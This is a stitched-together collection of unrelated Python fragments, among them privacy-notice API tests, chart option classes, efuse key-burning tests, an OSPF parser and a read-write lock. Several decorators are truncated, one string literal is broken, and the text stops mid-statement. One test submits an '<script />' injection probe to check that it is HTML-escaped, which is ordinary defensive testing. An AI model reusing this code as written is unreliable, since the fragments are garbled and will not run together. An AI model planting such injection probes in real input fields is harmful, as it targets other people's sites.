'my_test_privacy_notice') (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is not None) assert (privacy_center_exp is None) assert (overlay_exp.component == ComponentType.overlay) assert (overlay_exp.experience_config_id is not None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) assert (ca_overlay_exp is not None) assert (ca_privacy_center_exp is None) assert (ca_overlay_exp.component == ComponentType.overlay) assert (ca_overlay_exp.experience_config_id is not None) overlay_exp.delete(db) def test_post_privacy_notice_response_escaped(self, api_client, generate_auth_header, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) maybe_dangerous_description = "user's description <script />" resp = api_client.post((V1_URL_PREFIX + PRIVACY_NOTICE), headers=auth_header, json=[{'name': 'test privacy notice 1', 'notice_key': 'test_privacy_notice_1', 'description': maybe_dangerous_description, 'regions': [PrivacyNoticeRegion.be.value, PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['marketing.advertising'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True}]) assert (resp.status_code == 200) created_notice_data = resp.json()[0] assert (created_notice_data['description'] == "user's description <script />") created_notice = db.query(PrivacyNotice).get(created_notice_data['id']) assert (created_notice.description == 'user&#x27;s description &lt;script /&gt;') def test_post_privacy_notice_duplicate_regions(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) last_region = notice_request['regions'][(- 1)] notice_request['regions'].append(last_region) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Duplicate regions found.') def test_post_privacy_notice_twice_same_name(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 200) assert (len(resp.json()) == 1) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert (response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) notice_request['regions'] = [PrivacyNoticeRegion.us_co.value] before_creation_2 = datetime.now().isoformat() resp_2 = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp_2.status_code == 200) assert (len(resp_2.json()) == 1) response_notice_2 = resp_2.json()[0] assert (response_notice_2['name'] == notice_request['name']) assert ('id' in response_notice_2) assert (response_notice_2['version'] == 1.0) assert (response_notice_2['created_at'] < datetime.now().isoformat()) assert (response_notice_2['created_at'] > before_creation_2) assert (response_notice_2['updated_at'] < datetime.now().isoformat()) assert (response_notice_2['updated_at'] > before_creation_2) assert (not response_notice_2['disabled']) db_notice_2: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice_2['id']) db.refresh(db_notice_2) assert (response_notice_2['name'] == db_notice_2.name) assert (response_notice_2['version'] == db_notice_2.version) assert (response_notice_2['created_at'] == db_notice_2.created_at.isoformat()) assert (response_notice_2['updated_at'] == db_notice_2.updated_at.isoformat()) assert (response_notice_2['disabled'] == db_notice_2.disabled) assert (db_notice.id != db_notice_2.id) def test_post_multiple_privacy_notice(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_2]) assert (resp.status_code == 200) assert (len(resp.json()) == 2) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert (response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) response_notice_2 = resp.json()[1] assert (response_notice_2['name'] == notice_request_2['name']) assert ('id' in response_notice_2) assert (response_notice_2['version'] == 1.0) assert (response_notice_2['created_at'] < datetime.now().isoformat()) assert (response_notice_2['created_at'] > before_creation) assert (response_notice_2['updated_at'] < datetime.now().isoformat()) assert (response_notice_2['updated_at'] > before_creation) assert (not response_notice_2['disabled']) db_notice_2: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice_2['id']) db.refresh(db_notice_2) assert (response_notice_2['name'] == db_notice_2.name) assert (response_notice_2['version'] == db_notice_2.version) assert (response_notice_2['created_at'] == db_notice_2.created_at.isoformat()) assert (response_notice_2['updated_at'] == db_notice_2.updated_at.isoformat()) assert (response_notice_2['disabled'] == db_notice_2.disabled) def test_post_multiple_privacy_notice_notice_key_overlap(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_2['notice_key'] = 'test_privacy_notice_1' resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_2]) assert (resp.status_code == 422) assert (resp.json()['detail'] == "Privacy Notice 'test privacy notice 1' has already assigned notice key 'test_privacy_notice_1' to region 'us_ca'")
class OptionPlotoptionsPackedbubbleSonificationDefaultinstrumentoptionsMappingPlaydelay(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
def test_saving_image(monkeypatch): mock_file_open = mock_open() fake_uuid = '123e4567-e89b-12d3-a456-' def mock_uuidgen(): return fake_uuid fake_image_bytes = b'fake-image-bytes' fake_request_stream = io.BytesIO(fake_image_bytes) storage_path = 'fake-storage-path' store = look.images.ImageStore(storage_path, uuidgen=mock_uuidgen, fopen=mock_file_open) assert (store.save(fake_request_stream, 'image/png') == (fake_uuid + '.png')) assert (call().write(fake_image_bytes) in mock_file_open.mock_calls)
class SequenceRule(LoopStructuringRule): def can_be_applied(loop_node: AbstractSyntaxTreeNode): if ((not loop_node.is_endless_loop) or (not isinstance((body := loop_node.body), SeqNode))): return False end_nodes: Set[CodeNode] = set() for end_node in body.get_end_nodes(): if (not end_node.is_code_node_ending_with_break): return False end_nodes.add(end_node) return _has_only_loop_interruptions_in(end_nodes, body) def restructure(self): loop_node: LoopNode = self._asforest.current_root loop_body = loop_node.body self._delete_break_statements_for_loop(loop_body) self._asforest.remove_current_root() self._asforest.remove_root_node(loop_node) self._asforest.set_current_root(loop_body) def _delete_break_statements_for_loop(self, ast_node: AbstractSyntaxTreeNode): for code_node in ast_node.get_end_nodes(): code_node.clean() if code_node.does_end_with_break: code_node.instructions = code_node.instructions[:(- 1)] self._asforest.clean_up(ast_node)
class OptionPlotoptionsOrganizationSonificationContexttracksMappingGapbetweennotes(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
.parametrize('icon', ['', '', '']) def test_usage_single_emoji(nlp, icon): nlp.add_pipe('emoji') doc = nlp(('Hello %s world' % icon)) assert doc._.has_emoji assert doc[1]._.is_emoji assert (doc[1]._.emoji_desc == nlp.get_pipe('emoji').get_emoji_desc(doc[1])) assert doc[1:3]._.has_emoji assert (len(doc._.emoji) == 1) (emoji_text, emoji_idx, emoji_desc) = doc._.emoji[0] assert (emoji_text == icon) assert (emoji_idx == 1)
def extractForumWuxiaworldCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return False if ('WATTT' in item['tags']): return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix) return False
def get_module_class(python_module: str, python_class: str) -> Type[Module]: mod = importlib.import_module(python_module) if hasattr(mod, python_class): cls = getattr(mod, python_class) else: real_class_name = python_class for attr_name in dir(mod): attr = getattr(mod, attr_name) if inspect.isclass(attr): if (attr.__name__ == real_class_name): python_class = attr_name break else: raise NameError(f'Could not find Labgraph a class in module `{python_module}`` with the following class.__name__: `{real_class_name}`. If it refers to an anonymous class, consider moving it to the module scope of {python_module}.') cls = getattr(mod, python_class) assert issubclass(cls, Module), f'Expected a subclass of {Module.__name__}, got {cls.__name__}' if (not issubclass(cls, Module)): raise TypeError(f'Expected a subclass of {Module.__name__}, got {cls.__name__}') return cls
class AudioDataset(Dataset): def __init__(self, list_of_wav_files, sr, processor): self.list_of_wav_files = list_of_wav_files self.processor = processor self.sr = sr def __len__(self): return len(self.list_of_wav_files) def __getitem__(self, idx): wav_file = self.list_of_wav_files[idx] (audio_data, _) = librosa.load(wav_file, sr=self.sr) processed_data = self.processor(audio_data, sampling_rate=self.sr)['input_values'][0] return torch.from_numpy(processed_data)
class HCI_Cmd_LE_Set_Extended_Scan_Params(HCI_Command): def __init__(self, oaddr_type=0, nfilter=0, phys=1, scan_type=([0] * 8), interval=([10] * 8), window=([750] * 8)): super().__init__(b'\x08', b'A') self.payload.append(EnumByte('own addresss type', oaddr_type, {0: 'Public', 1: 'Random', 2: 'Private IRK or Public', 3: 'Private IRK or Random'})) self.payload.append(EnumByte('filter policy', nfilter, {0: 'None', 1: 'Sender In White List', 2: 'Almost None', 3: 'SIWL and some'})) self.payload.append(BitFieldByte('PHYs', phys, ['LE 1M', 'Reserv', 'LE Coded', 'Reserv', 'Reserv', 'Reserv', 'Reserv', 'Reserv'])) i = 0 mask = 1 while (i < 8): if (phys & mask): self.payload.append(EnumByte('scan type', scan_type[i], {0: 'Passive', 1: 'Active'})) self.payload.append(UShortInt('Interval', int(round((min(10240, max(2.5, interval[i])) / 0.625))), endian='little')) self.payload.append(UShortInt('Window', int(round((min(10240, max(2.5, min(interval[i], window[i]))) / 0.625))), endian='little')) mask <<= 1 i += 1
class WallSettings(Settings): absolute_params: dict[(str, Any)] = {} relative_params = {'edge_width': 1.0} base_class = WallEdge def edgeObjects(self, boxes, chars='aAbBcCdD|', add=True): bc = self.base_class bn = bc.__name__ wallholes = type((bn + 'Hole'), (WallHoles, bc), {})(boxes, self) edges = [bc(boxes, self), type((bn + 'Reversed'), (bc,), {'_reversed': True})(boxes, self), type((bn + 'Joined'), (WallJoinedEdge, bc), {})(boxes, self), type((bn + 'JoinedReversed'), (WallJoinedEdge, bc), {'_reversed': True})(boxes, self), type((bn + 'Back'), (WallBackEdge, bc), {})(boxes, self), type((bn + 'BackReversed'), (WallBackEdge, bc), {'_reversed': True})(boxes, self), type((bn + 'Hole'), (WallHoleEdge, bc), {})(boxes, wallholes), type((bn + 'HoleReversed'), (WallHoleEdge, bc), {'_reversed': True})(boxes, wallholes), wallholes] return self._edgeObjects(edges, boxes, chars, add)
class OptionPlotoptionsCylinderSonificationContexttracksMapping(Options): def frequency(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingFrequency': return self._config_sub_data('frequency', OptionPlotoptionsCylinderSonificationContexttracksMappingFrequency) def gapBetweenNotes(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingGapbetweennotes': return self._config_sub_data('gapBetweenNotes', OptionPlotoptionsCylinderSonificationContexttracksMappingGapbetweennotes) def highpass(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingHighpass': return self._config_sub_data('highpass', OptionPlotoptionsCylinderSonificationContexttracksMappingHighpass) def lowpass(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingLowpass': return self._config_sub_data('lowpass', OptionPlotoptionsCylinderSonificationContexttracksMappingLowpass) def noteDuration(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingNoteduration': return self._config_sub_data('noteDuration', OptionPlotoptionsCylinderSonificationContexttracksMappingNoteduration) def pan(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingPan': return self._config_sub_data('pan', OptionPlotoptionsCylinderSonificationContexttracksMappingPan) def pitch(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingPitch': return self._config_sub_data('pitch', OptionPlotoptionsCylinderSonificationContexttracksMappingPitch) def playDelay(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingPlaydelay': return self._config_sub_data('playDelay', OptionPlotoptionsCylinderSonificationContexttracksMappingPlaydelay) def rate(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingRate': return self._config_sub_data('rate', OptionPlotoptionsCylinderSonificationContexttracksMappingRate) def text(self): return self._config_get(None) def text(self, text: str): self._config(text, js_type=False) def time(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingTime': return self._config_sub_data('time', OptionPlotoptionsCylinderSonificationContexttracksMappingTime) def tremolo(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingTremolo': return self._config_sub_data('tremolo', OptionPlotoptionsCylinderSonificationContexttracksMappingTremolo) def volume(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingVolume': return self._config_sub_data('volume', OptionPlotoptionsCylinderSonificationContexttracksMappingVolume)
class ReachFrequencyPredictionMixin(): def reserve(self, prediction_to_release=None, reach=None, budget=None, impression=None): params = {self.Field.prediction_id: self.get_id_assured(), self.Field.prediction_id_to_release: prediction_to_release, self.Field.budget: budget, self.Field.reach: reach, self.Field.impression: impression, self.Field.action: self.Action.reserve} params = {k: v for (k, v) in params.items() if (v is not None)} response = self.get_api_assured().call('POST', (self.get_parent_id_assured(), self.get_endpoint()), params=params) return self.__class__(response.body(), self.get_parent_id_assured()) def cancel(self): params = {self.Field.prediction_id: self.get_id_assured(), self.Field.action: self.Action.cancel} self.get_api_assured().call('POST', (self.get_parent_id_assured(), self.get_endpoint()), params=params) return self
.skipif((arg_chip not in ['esp32s2', 'esp32s3', 'esp32s3beta1', 'esp32c3', 'esp32h2beta1', 'esp32c6', 'esp32h2', 'esp32p4']), reason='Supports 6 key blocks') class TestBurnKeyDigestCommands(EfuseTestCase): def test_burn_key_digest(self): self.espefuse_py('burn_key_digest -h') self.espefuse_py(f'burn_key_digest BLOCK_KEY0 {S_IMAGES_DIR}/rsa_secure_boot_signing_key.pem SECURE_BOOT_DIGEST0 BLOCK_KEY1 {S_IMAGES_DIR}/rsa_secure_boot_signing_key2.pem SECURE_BOOT_DIGEST1 BLOCK_KEY2 ', check_msg='A fatal error occurred: The number of blocks (3), datafile (2) and keypurpose (2) should be the same.', ret_code=2) self.espefuse_py(f'burn_key_digest BLOCK_KEY0 {S_IMAGES_DIR}/rsa_secure_boot_signing_key.pem SECURE_BOOT_DIGEST0 BLOCK_KEY1 {S_IMAGES_DIR}/rsa_secure_boot_signing_key2.pem SECURE_BOOT_DIGEST1 BLOCK_KEY2 {S_IMAGES_DIR}/rsa_secure_boot_signing_key2.pem SECURE_BOOT_DIGEST2') output = self.espefuse_py('summary -d') assert (1 == output.count(' = cb 27 91 a3 71 b0 c0 32 2b f7 37 04 78 ba 09 62 22 4c ab 1c f2 28 78 79 e4 29 67 3e 7d a8 44 63 R/-')) assert (2 == output.count(' = 90 1a 74 09 23 8d 52 d4 cb f9 6f 56 3f b3 f4 29 6d ab d6 6a 33 f5 3b 15 ee cd 8c b3 e7 ec 45 d3 R/-')) def test_burn_key_from_digest(self): self.espefuse_py(f'burn_key BLOCK_KEY0 {S_IMAGES_DIR}/rsa_public_key_digest.bin SECURE_BOOT_DIGEST0') output = self.espefuse_py('summary -d') assert (1 == output.count(' = cb 27 91 a3 71 b0 c0 32 2b f7 37 04 78 ba 09 62 22 4c ab 1c f2 28 78 79 e4 29 67 3e 7d a8 44 63 R/-')) self.espefuse_py(f'burn_key_digest BLOCK_KEY1 {S_IMAGES_DIR}/rsa_secure_boot_signing_key.pem SECURE_BOOT_DIGEST1') output = self.espefuse_py('summary -d') assert (2 == output.count(' = cb 27 91 a3 71 b0 c0 32 2b f7 37 04 78 ba 09 62 22 4c ab 1c f2 28 78 79 e4 29 67 3e 7d a8 44 63 R/-'))
class TestProcessValue(object): def setting_info(self): return {'value_type': 'choice', 'choices': {'foo': 221, 0: 170, 10: 187, 20: 204, 'multi': [17, 34]}} def test_valid_choice_int(self, setting_info): assert (choice.process_value(setting_info, 10) == [187]) def test_valid_choice_str_int(self, setting_info): assert (choice.process_value(setting_info, '10') == [187]) def test_valid_choice_str(self, setting_info): assert (choice.process_value(setting_info, 'foo') == [221]) def test_valid_choice_with_multibyte_value(self, setting_info): assert (choice.process_value(setting_info, 'multi') == [17, 34]) def test_not_valid_choice(self, setting_info): with pytest.raises(ValueError): choice.process_value(setting_info, 42)
def test_chain_get_ancestors_from_block_5(chain): genesis = chain.get_canonical_block_by_number(0) (block_1, block_2, block_3, block_4, block_5) = [chain.mine_block() for _ in range(5)] header = block_5.header assert (header.block_number == 5) assert (chain.get_ancestors(0, header) == ()) assert (chain.get_ancestors(1, header) == (block_4,)) assert (chain.get_ancestors(2, header) == (block_4, block_3)) assert (chain.get_ancestors(3, header) == (block_4, block_3, block_2)) assert (chain.get_ancestors(4, header) == (block_4, block_3, block_2, block_1)) assert (chain.get_ancestors(5, header) == (block_4, block_3, block_2, block_1, genesis)) assert (chain.get_ancestors(6, header) == (block_4, block_3, block_2, block_1, genesis)) assert (chain.get_ancestors(10, header) == (block_4, block_3, block_2, block_1, genesis))
def extractRiritranslationsBlogspotCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
class OptionSeriesTilemapSonificationContexttracksMappingLowpassResonance(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
(nopython=True, cache=const.numba_cache) def ball_linear_cushion_collision_time(rvw, s, lx, ly, l0, p1, p2, direction, mu, m, g, R): if ((s == const.spinning) or (s == const.pocketed) or (s == const.stationary)): return np.inf phi = ptmath.angle(rvw[1]) v = ptmath.norm3d(rvw[1]) u = get_u(rvw, R, phi, s) K = (((- 0.5) * mu) * g) cos_phi = np.cos(phi) sin_phi = np.sin(phi) ax = (K * ((u[0] * cos_phi) - (u[1] * sin_phi))) ay = (K * ((u[0] * sin_phi) + (u[1] * cos_phi))) (bx, by) = ((v * cos_phi), (v * sin_phi)) (cx, cy) = (rvw[(0, 0)], rvw[(0, 1)]) A = ((lx * ax) + (ly * ay)) B = ((lx * bx) + (ly * by)) if (direction == 0): C = (((l0 + (lx * cx)) + (ly * cy)) + (R * np.sqrt(((lx ** 2) + (ly ** 2))))) (root1, root2) = ptmath.roots.quadratic.solve(A, B, C) roots = [root1, root2] elif (direction == 1): C = (((l0 + (lx * cx)) + (ly * cy)) - (R * np.sqrt(((lx ** 2) + (ly ** 2))))) (root1, root2) = ptmath.roots.quadratic.solve(A, B, C) roots = [root1, root2] else: C1 = (((l0 + (lx * cx)) + (ly * cy)) + (R * np.sqrt(((lx ** 2) + (ly ** 2))))) C2 = (((l0 + (lx * cx)) + (ly * cy)) - (R * np.sqrt(((lx ** 2) + (ly ** 2))))) (root1, root2) = ptmath.roots.quadratic.solve(A, B, C1) (root3, root4) = ptmath.roots.quadratic.solve(A, B, C2) roots = [root1, root2, root3, root4] min_time = np.inf for root in roots: if (np.abs(root.imag) > const.EPS): continue if (root.real <= const.EPS): continue (rvw_dtau, _) = evolve.evolve_state_motion(s, rvw, R, m, mu, 1, mu, g, root) s_score = ((- np.dot((p1 - rvw_dtau[0]), (p2 - p1))) / np.dot((p2 - p1), (p2 - p1))) if (not (0 <= s_score <= 1)): continue if (root.real < min_time): min_time = root.real return min_time
_eh class HakuroukenHandler(THBEventHandler): interested = ['action_before'] execute_before = ['WineHandler', 'MomijiShieldHandler'] def handle(self, evt_type, act): if ((evt_type == 'action_before') and isinstance(act, basic.BaseAttack)): if act.cancelled: return act src = act.source if (not src.has_skill(HakuroukenSkill)): return act card = act.associated_card if (not (card.suit == Card.CLUB)): return act g = self.game if (not g.user_input([src], ChooseOptionInputlet(self, (False, True)))): return act g.process_action(Hakurouken(src, act.target)) return act
class TestLinearDisplayP3Poperties(util.ColorAsserts, unittest.TestCase): def test_r(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['r'], 0.1) c['r'] = 0.2 self.assertEqual(c['r'], 0.2) def test_g(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['g'], 0.2) c['g'] = 0.1 self.assertEqual(c['g'], 0.1) def test_b(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['b'], 0.3) c['b'] = 0.1 self.assertEqual(c['b'], 0.1) def test_alpha(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['alpha'], 1) c['alpha'] = 0.5 self.assertEqual(c['alpha'], 0.5)
class TestPubSub(unittest.TestCase): def test_on_message_published_decorator(self): func = MagicMock() func.__name__ = 'testfn' decorated_func = on_message_published(topic='hello-world')(func) endpoint = getattr(decorated_func, '__firebase_endpoint__') self.assertIsNotNone(endpoint) self.assertIsNotNone(endpoint.eventTrigger) self.assertIsNotNone(endpoint.eventTrigger['eventType']) self.assertEqual('hello-world', endpoint.eventTrigger['eventFilters']['topic']) def test_message_handler(self): func = MagicMock() raw_event = _CloudEvent(attributes={'id': 'test-message', 'source': ' 'specversion': '1.0', 'time': '2023-03-11T13:25:37.403Z', 'type': 'com.example.pubsub.message'}, data={'message': {'attributes': {'key': 'value'}, 'data': 'eyJ0ZXN0IjogInZhbHVlIn0=', 'message_id': 'message-id-123', 'publish_time': '2023-03-11T13:25:37.403Z'}, 'subscription': 'my-subscription'}) _message_handler(func, raw_event) func.assert_called_once() event_arg = func.call_args.args[0] self.assertIsInstance(event_arg, CloudEvent) self.assertIsInstance(event_arg.data, MessagePublishedData) self.assertIsInstance(event_arg.data.message, Message) self.assertEqual(event_arg.data.message.message_id, 'message-id-123') self.assertEqual(event_arg.data.message.publish_time, _dt.datetime.strptime('2023-03-11T13:25:37.403Z', '%Y-%m-%dT%H:%M:%S.%f%z')) self.assertDictEqual(event_arg.data.message.attributes, {'key': 'value'}) self.assertEqual(event_arg.data.message.data, 'eyJ0ZXN0IjogInZhbHVlIn0=') self.assertIsNone(event_arg.data.message.ordering_key) self.assertEqual(event_arg.data.subscription, 'my-subscription')
class TestCalendarExport(ApiBaseTest): def setUp(self): super().setUp() self.year = datetime.date.today().year self.dates = [factories.CalendarDateFactory(category='election', start_date=datetime.datetime(self.year, 10, 1), all_day=True), factories.CalendarDateFactory(category='Roundtables', start_date=datetime.datetime(self.year, 10, 31, 2), end_date=datetime.datetime(self.year, 10, 31, 3))] def test_csv_export(self): resp = self.app.get(api.url_for(CalendarDatesExport, renderer='csv')) sio = io.StringIO(resp.data.decode()) reader = csv.DictReader(sio) rows = list(reader) assert (len(rows) == len(self.dates)) assert (set(rows[0].keys()) == set(['summary', 'description', 'location', 'start_date', 'end_date', 'category'])) def test_ics_export(self): resp = self.app.get(api.url_for(CalendarDatesExport, renderer='ics')) cal = Calendar.from_ical(resp.data) components = cal.subcomponents assert (len(components) == 2) assert (str(components[0]['CATEGORIES']) == 'election') timezone = pytz.timezone('US/Eastern') assert (components[0]['DTSTART'].dt == datetime.date(self.year, 10, 1)) assert (components[1]['DTSTART'].dt == timezone.localize(datetime.datetime(self.year, 10, 31, 2)))
class S3BlobManager(BlobManager): def __init__(self, config: Dict[(str, Any)]): super().__init__(config) self.s3_client = boto3.client(service_name=config.get('service_name', None), region_name=config.get('region_name', None), api_version=config.get('api_version', None), use_ssl=config.get('use_ssl', None), verify=config.get('verify', None), endpoint_url=config.get('endpoint_url', None), aws_access_key_id=config.get('access_key_id', None), aws_secret_access_key=config.get('secret_access_key', None), aws_session_token=config.get('session_token', None), config=Config(**config.get('config', {}))) self.bucket_name = config.get('bucket_name', None) def upload(self, local_file_path: str) -> str: file_name = os.path.basename(local_file_path) with open(local_file_path, 'rb') as f: self.s3_client.upload_fileobj(f, self.bucket_name, file_name) return file_name def download(self, remote_file_path: str, local_dir: str) -> str: file_name = os.path.basename(remote_file_path) local_file_path = os.path.join(local_dir, file_name) if (not os.path.exists(local_file_path)): lock_file_path = os.path.join(local_dir, '{}.lock'.format(file_name)) lock_file = open(lock_file_path, 'w') fcntl.flock(lock_file.fileno(), fcntl.LOCK_EX) try: if (not os.path.exists(local_file_path)): self.log.info('Downloading S3 object: {}'.format(remote_file_path)) self._get_s3_object(local_file_path, remote_file_path) except Exception as e: self.log.error('Failed to download S3 object: {}'.format(remote_file_path), exc_info=e) finally: fcntl.flock(lock_file.fileno(), fcntl.LOCK_UN) lock_file.close() if os.path.exists(lock_file_path): try: os.remove(lock_file_path) except OSError as e: self.log.warning('Failed to remove lock file: {}'.format(lock_file_path), exc_info=e) else: self.log.debug('S3 file: {} already exist at {}'.format(remote_file_path, local_file_path)) return local_file_path def _get_s3_object(self, local_path, object_key, retry_sleep_sec=5): for i in range(3): try: with open(local_path, 'wb') as f: self.s3_client.download_fileobj(self.bucket_name, object_key, f) return except Exception as e: logger.error('Downloading object {} failed, retrying {}/3 in {} second'.format(object_key, (i + 1), retry_sleep_sec), exc_info=e) time.sleep(retry_sleep_sec) raise RuntimeError('Failed to download S3 file: {}'.format(object_key))
def serialise_talent_data(save_data: list[int], talents: dict[(str, Any)]) -> list[int]: save_data = write(save_data, len(talents), 4) for cat_id in talents: cat_talent_data = talents[cat_id] save_data = write(save_data, int(cat_id), 4) save_data = write(save_data, len(cat_talent_data), 4) for talent in cat_talent_data: save_data = write(save_data, talent['id'], 4) save_data = write(save_data, talent['level'], 4) return save_data
_type(OSPF_MSG_LS_ACK) class OSPFLSAck(OSPFMessage): _MIN_LEN = OSPFMessage._HDR_LEN def __init__(self, length=None, router_id='0.0.0.0', area_id='0.0.0.0', au_type=1, authentication=0, checksum=None, version=_VERSION, lsa_headers=None): lsa_headers = (lsa_headers if lsa_headers else []) super(OSPFLSAck, self).__init__(OSPF_MSG_LS_ACK, length, router_id, area_id, au_type, authentication, checksum, version) self.lsa_headers = lsa_headers def parser(cls, buf): lsahdrs = [] while buf: (kwargs, buf) = LSAHeader.parser(buf) lsahdrs.append(LSAHeader(**kwargs)) return {'lsa_headers': lsahdrs} def serialize_tail(self): return reduce((lambda a, b: (a + b)), (hdr.serialize() for hdr in self.lsa_headers))
class RWLockWriteD(RWLockableD): def __init__(self, lock_factory: Callable[([], Lockable)]=threading.Lock, time_source: Callable[([], float)]=time.perf_counter) -> None: self.v_read_count: _ThreadSafeInt = _ThreadSafeInt(lock_factory=lock_factory, initial_value=0) self.v_write_count: int = 0 self.c_time_source = time_source self.c_lock_read_count = lock_factory() self.c_lock_write_count = lock_factory() self.c_lock_read_entry = lock_factory() self.c_lock_read_try = lock_factory() self.c_resource = lock_factory() class _aReader(Lockable): def __init__(self, p_RWLock: 'RWLockWriteD') -> None: self.c_rw_lock = p_RWLock self.v_locked: bool = False def acquire(self, blocking: bool=True, timeout: float=(- 1)) -> bool: p_timeout = (None if (blocking and (timeout < 0)) else (timeout if blocking else 0)) c_deadline = (None if (p_timeout is None) else (self.c_rw_lock.c_time_source() + p_timeout)) if (not self.c_rw_lock.c_lock_read_entry.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): return False if (not self.c_rw_lock.c_lock_read_try.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_read_entry.release() return False if (not self.c_rw_lock.c_lock_read_count.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_read_entry.release() return False self.c_rw_lock.v_read_count.increment() if (1 == self.c_rw_lock.v_read_count): if (not self.c_rw_lock.c_resource.acquire(blocking=True, 